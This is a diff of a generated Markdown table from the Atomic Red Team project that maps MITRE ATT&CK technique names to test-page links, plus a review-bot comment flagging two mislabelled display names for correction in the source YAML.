+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+| | | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
+| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
+| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Impair Defenses](../../T1562/T1562.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Debugger Evasion](../../T1622/T1622.md) | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
+| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
+| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
+| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
+| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
+| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
+| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
+| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
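Review bot: Two display-name problems in the regenerated matrix rows of this hunk, both of which should be fixed in the technique yaml the generator reads rather than in this generated table. The row containing `[Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)` links an "Email Collection" name to a T1070 sub-technique, while the same parent T1070 appears elsewhere in the hunk as `[Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)` and `[Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)`; one of those parent names is stale. And `[Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)` carries a trailing period inside the link text. Correcting them at the source keeps the next regeneration from reintroducing them.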
@@ -107,6 +108,7 @@
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
+| | | | | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
@@ -123,7 +125,10 @@
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | | | ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
